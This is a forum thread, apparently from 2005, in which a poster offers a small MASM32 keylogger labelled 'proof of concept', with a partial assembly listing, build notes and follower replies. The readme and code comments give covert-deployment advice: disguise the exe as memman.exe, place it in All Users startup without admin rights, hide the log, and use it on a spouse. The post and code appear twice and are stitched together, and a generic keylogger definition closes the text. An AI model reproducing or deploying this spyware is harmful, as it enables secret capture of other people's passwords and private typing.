The Programs and Files included are Copyright 2005, by ZOverLord
This is a Proof Of Concept for Educational Purposes ONLY!

Notes:

This program is 4K big, as in 4,096 bytes and can do ANYTHING other Key-Loggers
claim, this is Version 1.0, a Stealth version will be next to show Hiding concepts.

The program was created because MANY people claimed that you could NOT use a
Stand-Alone program ("Without the Global hook procedure being located in a DLL") to do low-level
keyboard Key-Logging. As I say.....

"We Don't NEED NO STINKIN DLL!"

The program(s) "They both produce the same output, one is Raw ASM and the other uses
INVOKES. This was done in order to try and HELP others learn ASM a little
better, instead of trying to make ASM look like some FRICKEN C++ MACRO from HELL Language, lol

In any event, the RAW version has more comments if your trying to figure out
how the MAGIC is done. There is some MASS confusion with MANY seasoned programmers
as to just HOW to get some Data, when the process is NOT in your CONTEXT.

LOL, Hope this helps BOYS! Ok, you need the latest and greatest MASM32 if you want
to compile this and LEARN SOMETHING! Download and install it from here:

Once you have done that you can click on the C:\ZKeyLog\ZKeyLogV1.bat file and
it will build BOTH versions, as well as compile an addtional Library needed in
msvcrt.inc, which will create a msvcrt.lib file in the c:\ZKeyLog folder as well.

No matter if you re-compile the programs or not the following directions will help.

Decide which of the two versions you wish to use, if needed to be more Stealth like
make a copy of either ZKeyLogV1Raw.exe or ZKeyLogV1.exe and rename it to something
which won't raise EyeBrows like memman.exe, for example.

REMEMBER, anytime you do Key-Logging you run the RISK of IF someone gets into
your system and the log contains sensitive data such as bank account info or
passwords, you could cause Your Self some MAJOR Grief, we take NO responsibility
on the use of this. You maybe better off re-compiling this and change the log
file to ANOTHER name, just in case this Key-Logger gets Popular, and people start
to look for the log name.

Now, IF the program is NOT placed in a StartUp Folder the LOG will be in the
same folder as the program is run, again the DEFAULT log name is ZKeyLog.txt.

If the program is placed in a Startup Folder, it will be in the Default PATH of
that user. So for example if you placed the program in the ALL Users Startup
folder, then each user would have a LOG file called ZKeyLog.txt in their default
path.

You can HIDE the log file by setting the file to be hidden, this way users will
not know it is there, like your Cheating Wife or Husband for example ;-)

If you have any Questions, open the ZKeyLogV1Raw.asm file in notepad, it has more
comments than the ZKeyLogV1.asm file. If you are still STUCK and need answers
email me at ZOverLords@Yahoo.com.

Enjoy, I hope this helps others learn the ASM Language, It is amazing on what you
can do with ASM with such a small FootPrint. Enjoy!

First, you will need to build a NEW library that is not currently in MASM32 called msvcrt.lib from this file called msvcrt.inc:

Third, here is the Low-Level MASM32 source, which is called ZKeyLogV1Raw.asm

Code:

;*******************************************************************************************
; (BEST Viewed with NOTEPAD)
; CopyRight 2005, by ZOverLord at ZOverLords@Yahoo.com - ALL Rights Reserved
;
; "We Don't NEED no STINKIN DLL!"......ENJOY! vist http://testing.OnlyTheRightAnswers.com
;
; Proof Of Concept of using Low-Level Hooks without using any DLL for the Hook
; This Program is for Educational Proof Of Concept Use ONLY!
;
; This Program compiles in 4K, get it that's 4,096 Bytes. I got TIRED of all these folks
; who need a FAT program as well as a FAT DLL to create a Key-Logger so in frustration
; this proof of concept was created. Log Items include:
;
; Date-Time Stamps, Program Name, Window Title, Window Class, Domain Name, Computer Name
; User Name as well as the ability to be placed in StartUp Folders for ANY and/or ALL
; users. There is NOT any requirement for this to run as ADMIN, ANYONE can place it in
; the startup folder of any user, or for all users.
;
; The Logfile is named ZKeyLog.txt and seperate logs can be kept for seperate users this
; can be done automatically by simply placing the program in the:
;
; C:\Documents and Settings\All Users\Start Menu\Programs\Startup folder
;
; C:\Documents and Settings\?USER?\ folder as ZKeyLog.txt
; ("You can change the File to Hidden if needed")
;
; A Hot-Key of [CTRL]-[ALT]-[F11] will turn the Key-Logger Off
;
; There are two flavors one Raw ASM and one using INVOKES, Raw has more comments, low-level.
;
; You can rename the EXE file to something NOT so obvious if needed, read the AReadMe.txt
;
;*******************************************************************************************
.386
.model flat, stdcall
option casemap:none

include \masm32\include\windows.inc
include \masm32\include\kernel32.inc
include \masm32\include\user32.inc
include \masm32\include\advapi32.inc
include msvcrt.inc

main:
push offset onlyOneCopy ; check to make sure we are the only copy
push 0 ; of this program running for this user
push 0 ; for fast user switching we can still have
call CreateMutexA ; one copy per user running with this check
call GetLastError ; but if this user is running one already. we exit
cmp eax,ERROR_ALREADY_EXISTS
je more_than_one_copy

xor ebx, ebx ; Zero Out ebx

push VK_F11 ; this will switch logger off using CTRL+ALT+F11 together
push MOD_CONTROL or MOD_ALT
push 0badfaceh ; name of register key -> "0BADFACE"
push ebx ;
call RegisterHotKey ; we got a new hot key

call GetForegroundWindow ; get handle for currently used window ( specific to NT and after )
cmp [hCurrentWindow], eax ; if its not different to last one saved..
je no_window_change ; bypass all the headings

lea esi, [hCurrentThreadPiD] ; get the processid that sent the key
push esi ; using the HWND we got earlier from
mov eax, [hCurrentWindow] ; our GetForegroundWindow call
push eax ; we need it to get the program exe name
call GetWindowThreadProcessId

mov ebx, hCurrentThreadPiD ; remember we are NOT using a DLL so.....
push ebx ; we need to use ToolHelp procs to get
push TH32CS_SNAPMODULE ; the program exe name of who sent us
call CreateToolhelp32Snapshot ; this key
mov hSnapShot,eax ; save the ToolHelp Handle to close later

mov hmodul.dwSize, sizeof MODULEENTRY32; need to initialize size or we will fail

push offset hmodul ; first Module is always module for process
mov eax, [hSnapShot] ; so safe to assume that the exe file name here
push eax ; will always be the right one for us
call Module32First

mov eax, [hSnapShot] ; we are done with ToolHelp so we need
push eax ; to tell it we wish to close
call CloseHandle

Please let me know what you think, the goal was to try and show others how easy it is to use Low-Level Global Hooks without needing a DLL and to show how to get data from other programs that are not in your context when using Global Hooks and no dll.

This example can be used as a baseline for similar code in C++, there really is no requirement to understand ASM or MASM32 for that matter to see how this works.

Any Comments or Questions Please ask or Post. If you think this example ROCKS, please rate this thread, again thanks

Thanks

ZOverLord

December 31st, 2005, 09:29 PM

ZOverLord

Re: 4k Key-Logger Using (NO) DLL Example

This Project is now a featured article at RootKit.com

January 24th, 2006, 10:38 AM

Tanner85

Re: 4k Key-Logger Using (NO) DLL Example

Really interesting! When will you publish the next chapter? (stealth)?

September 17th, 2013, 12:00 AM

jimmaqualin

Re: 4k Key-Logger Using (NO) DLL Example

Quote:

Originally Posted by Tanner85

Really interesting! When will you publish the next chapter? (stealth)?

Keylogger program also take a screenshot of PC monitor (from when you turn on the pc to when you turn it off) in stealth mode.

The Programs and Files included are Copyright 2005, by ZOverLord
This is a Proof Of Concept for Educational Purposes ONLY!

Notes:

This program is 4K big, as in 4,096 bytes and can do ANYTHING other Key-Loggers
claim, this is Version 1.0, a Stealth version will be next to show Hiding concepts.

The program was created because MANY people claimed that you could NOT use a
Stand-Alone program ("Without the Global hook procedure being located in a DLL") to do low-level
keyboard Key-Logging. As I say.....

"We Don't NEED NO STINKIN DLL!"

The program(s) "They both produce the same output, one is Raw ASM and the other uses
INVOKES. This was done in order to try and HELP others learn ASM a little
better, instead of trying to make ASM look like some FRICKEN C++ MACRO from HELL Language, lol

In any event, the RAW version has more comments if your trying to figure out
how the MAGIC is done. There is some MASS confusion with MANY seasoned programmers
as to just HOW to get some Data, when the process is NOT in your CONTEXT.

LOL, Hope this helps BOYS! Ok, you need the latest and greatest MASM32 if you want
to compile this and LEARN SOMETHING! Download and install it from here:

Once you have done that you can click on the C:\ZKeyLog\ZKeyLogV1.bat file and
it will build BOTH versions, as well as compile an addtional Library needed in
msvcrt.inc, which will create a msvcrt.lib file in the c:\ZKeyLog folder as well.

No matter if you re-compile the programs or not the following directions will help.

Decide which of the two versions you wish to use, if needed to be more Stealth like
make a copy of either ZKeyLogV1Raw.exe or ZKeyLogV1.exe and rename it to something
which won't raise EyeBrows like memman.exe, for example.

REMEMBER, anytime you do Key-Logging you run the RISK of IF someone gets into
your system and the log contains sensitive data such as bank account info or
passwords, you could cause Your Self some MAJOR Grief, we take NO responsibility
on the use of this. You maybe better off re-compiling this and change the log
file to ANOTHER name, just in case this Key-Logger gets Popular, and people start
to look for the log name.

Now, IF the program is NOT placed in a StartUp Folder the LOG will be in the
same folder as the program is run, again the DEFAULT log name is ZKeyLog.txt.

If the program is placed in a Startup Folder, it will be in the Default PATH of
that user. So for example if you placed the program in the ALL Users Startup
folder, then each user would have a LOG file called ZKeyLog.txt in their default
path.

You can HIDE the log file by setting the file to be hidden, this way users will
not know it is there, like your Cheating Wife or Husband for example ;-)

If you have any Questions, open the ZKeyLogV1Raw.asm file in notepad, it has more
comments than the ZKeyLogV1.asm file. If you are still STUCK and need answers
email me at ZOverLords@Yahoo.com.

Enjoy, I hope this helps others learn the ASM Language, It is amazing on what you
can do with ASM with such a small FootPrint. Enjoy!

First, you will need to build a NEW library that is not currently in MASM32 called msvcrt.lib from this file called msvcrt.inc:

Third, here is the Low-Level MASM32 source, which is called ZKeyLogV1Raw.asm

Code:

;*******************************************************************************************
; (BEST Viewed with NOTEPAD)
; CopyRight 2005, by ZOverLord at ZOverLords@Yahoo.com - ALL Rights Reserved
;
; "We Don't NEED no STINKIN DLL!"......ENJOY! vist http://testing.OnlyTheRightAnswers.com
;
; Proof Of Concept of using Low-Level Hooks without using any DLL for the Hook
; This Program is for Educational Proof Of Concept Use ONLY!
;
; This Program compiles in 4K, get it that's 4,096 Bytes. I got TIRED of all these folks
; who need a FAT program as well as a FAT DLL to create a Key-Logger so in frustration
; this proof of concept was created. Log Items include:
;
; Date-Time Stamps, Program Name, Window Title, Window Class, Domain Name, Computer Name
; User Name as well as the ability to be placed in StartUp Folders for ANY and/or ALL
; users. There is NOT any requirement for this to run as ADMIN, ANYONE can place it in
; the startup folder of any user, or for all users.
;
; The Logfile is named ZKeyLog.txt and seperate logs can be kept for seperate users this
; can be done automatically by simply placing the program in the:
;
; C:\Documents and Settings\All Users\Start Menu\Programs\Startup folder
;
; C:\Documents and Settings\?USER?\ folder as ZKeyLog.txt
; ("You can change the File to Hidden if needed")
;
; A Hot-Key of [CTRL]-[ALT]-[F11] will turn the Key-Logger Off
;
; There are two flavors one Raw ASM and one using INVOKES, Raw has more comments, low-level.
;
; You can rename the EXE file to something NOT so obvious if needed, read the AReadMe.txt
;
;*******************************************************************************************
.386
.model flat, stdcall
option casemap:none

include \masm32\include\windows.inc
include \masm32\include\kernel32.inc
include \masm32\include\user32.inc
include \masm32\include\advapi32.inc
include msvcrt.inc

main:
push offset onlyOneCopy ; check to make sure we are the only copy
push 0 ; of this program running for this user
push 0 ; for fast user switching we can still have
call CreateMutexA ; one copy per user running with this check
call GetLastError ; but if this user is running one already. we exit
cmp eax,ERROR_ALREADY_EXISTS
je more_than_one_copy

xor ebx, ebx ; Zero Out ebx

push VK_F11 ; this will switch logger off using CTRL+ALT+F11 together
push MOD_CONTROL or MOD_ALT
push 0badfaceh ; name of register key -> "0BADFACE"
push ebx ;
call RegisterHotKey ; we got a new hot key

call GetForegroundWindow ; get handle for currently used window ( specific to NT and after )
cmp [hCurrentWindow], eax ; if its not different to last one saved..
je no_window_change ; bypass all the headings

lea esi, [hCurrentThreadPiD] ; get the processid that sent the key
push esi ; using the HWND we got earlier from
mov eax, [hCurrentWindow] ; our GetForegroundWindow call
push eax ; we need it to get the program exe name
call GetWindowThreadProcessId

mov ebx, hCurrentThreadPiD ; remember we are NOT using a DLL so.....
push ebx ; we need to use ToolHelp procs to get
push TH32CS_SNAPMODULE ; the program exe name of who sent us
call CreateToolhelp32Snapshot ; this key
mov hSnapShot,eax ; save the ToolHelp Handle to close later

mov hmodul.dwSize, sizeof MODULEENTRY32; need to initialize size or we will fail

push offset hmodul ; first Module is always module for process
mov eax, [hSnapShot] ; so safe to assume that the exe file name here
push eax ; will always be the right one for us
call Module32First

mov eax, [hSnapShot] ; we are done with ToolHelp so we need
push eax ; to tell it we wish to close
call CloseHandle

Please let me know what you think, the goal was to try and show others how easy it is to use Low-Level Global Hooks without needing a DLL and to show how to get data from other programs that are not in your context when using Global Hooks and no dll.

This example can be used as a baseline for similar code in C++, there really is no requirement to understand ASM or MASM32 for that matter to see how this works.

Any Comments or Questions Please ask or Post. If you think this example ROCKS, please rate this thread, again thanks

Thanks

ZOverLord

A keylogger, also known as keystroke logging, is a program installed on your computer unbeknownst to you that logs all key strokes typed into your computer which is then viewed by a third party. Keyloggers are also capable of taking screen captures.